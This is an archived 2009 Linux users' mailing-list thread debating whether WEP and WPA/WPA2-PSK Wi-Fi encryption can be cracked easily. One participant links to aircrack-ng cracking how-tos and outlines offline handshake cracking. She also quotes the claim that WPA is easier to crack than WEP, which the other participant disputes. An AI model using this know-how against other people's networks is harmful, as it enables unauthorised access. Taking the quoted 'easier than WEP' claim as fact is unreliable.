running Linux on odd devices is SOOO COOL!

Kurt Granroth kurt+plug-discuss at granroth.com
Sat Nov 14 22:21:46 MST 2009


Lisa,

I'll grant you the denial-of-service attack, but I'm still not finding 
any evidence that WPA is fundamentally flawed (much less "easier to 
crack... than WEP").

I read the aircrack article earlier to see if there was new info that I 
had missed.  I also read the article you have on obnosis.com.  Finally, 
I read the LucidInteractive article you just provided.

ALL of them say the same thing: the only valid attack on WPA-PSK is a 
dictionary or brute force attack!

Okay, yes, it's very handy that you can do the password cracking 
offline.  But see the links I listed earlier... any decently crafted 
password will be nigh IMPOSSIBLE to crack unless you have nearly 
infinite resources -- offline or no.

I realize that you likely (for sure) know more about this than I do so 
if I keep missing some fundamental flaw in PSK in all of the articles 
provided, please enlighten me!

Kurt

On 11/14/09 5:59 PM, Lisa Kachold wrote:
> Kurt,
>
> As you stated, WPA/WPA2-PSK security is inherently flawed:
>
>     * One flaw allowed an attacker to cause a denial-of-service attack,
>       if the attacker could bypass several other layers of protection.
>     * A second flaw exists in the method with which WPA initializes its
>       encryption scheme. Consequently, it's actually easier to crack WPA
>       than it is to crack WEP. This flaw is the subject of this article.
>
>
> A WPA key /can/ be made good enough to make cracking it unfeasible. WPA
> is also a little more cracker friendly. By capturing the right type of
> packets, you can do your cracking offline. This means you only have to
> be near the AP for a matter of seconds to get what you need. WPA
> basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS
> is not so much.
>
> /_*But how many people actually have WPA RADIUS encryption?*_/
>
> Here's another link that includes PSK cracking Howto:
> http://www.aircrack-ng.org/doku.php?id=cracking_wpa
>
> Using airocrack-ng tools in Backtrack (per my presentation materials at
> http://plug.phoenix.az.us show) WEP and WPA/WPA2-PSK are easy to crack.
>
> Does anyone here run Radius?
>
> Here's an accompanying document to better explain it:
> http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
>
>
> On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth
> <kurt+plug-discuss at granroth.com
> <mailto:kurt%2Bplug-discuss at granroth.com>> wrote:
>
>     On 11/14/09 12:02 PM, Lisa Kachold wrote:
>      > The whole concept of "wireless encryption security" is somewhat moot
>      > with airdump-ng etc tools.
>      >
>      > WEP keys are really easy to break.
>      >
>      > WPA is also easily encroached - but harder with a truely unique
>     secure
>      > key (which few people use)
>      >
>      > It just exists as part of the big "security" matrix to keep the
>     honest
>      > people out.  Crackers can get right in anyway!
>      >
>      > http://www.obnosis.com/Layer8Wireless.html
>
>     Okay, I have to take exception to how this is written.  You are
>     comparing the security of WEP and WPA as if they are somehow equivalent
>     or equally "easy" to crack.  That is just not true.
>
>     WEP is fundamentally broken.  It can be reliably cracked in seconds, in
>     most cases.  Its use is more of a "please don't use this network" flag
>     than any real attempt to keep people out.
>
>     WPA, on the other hand, is NOT broken.  Only one variation of it is
>     crackable at all (PSK) and even then, the attack is a brute force
>     dictionary attack.  By that argument, ALL password based encryption is
>     crackable.
>
>     Yes, you could successfully argue that since MOST home APs use PSK and
>     MOST probably just set the password to 'admin' or 'linksys' or some
>     other trivial name, that IN PRACTICE, it's not hard to crack most uses
>     of WPA.
>
>     But saying that "[c]rackers can get right in anyway" just isn't true.
>     All that is needed is a reasonably difficult password.  Don't use a
>     dictionary word and make it decently long and it quickly becomes far too
>     difficult to crack to make it worth it for all but the most extreme
>     cases.  It's either VERY expensive or takes YEARS.
>
>     I'm sure that you read this:
>
>     http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>
>     It answers the question: "how much does it cost to crack a password?"
>     It assumes that you are using Amazon EC2 at $0.30 an hour.  A twelve
>     character password using the full ASCII set would cost over $8 TRILLION
>     dollars to crack.  Even much smaller passwords are still in the
>     millions.
>
>     The password that I use on my WPA2-PSK AP is 20-odd chars long and spans
>     the ASCII range.  Far from allowing crackers to "get right in", it's
>     nearly impossible for them to do so.
>     ---------------------------------------------------
>     PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>     <mailto:PLUG-discuss at lists.plug.phoenix.az.us>
>     To subscribe, unsubscribe, or to change your mail settings:
>     http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>
>
>
> --
> Skype: (623)239-3392
> AT&T: (503)754-4452
> www.it-clowns.com <http://www.it-clowns.com>
>
>
>
>
>
>
>
>
>
>
>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss



More information about the PLUG-discuss mailing list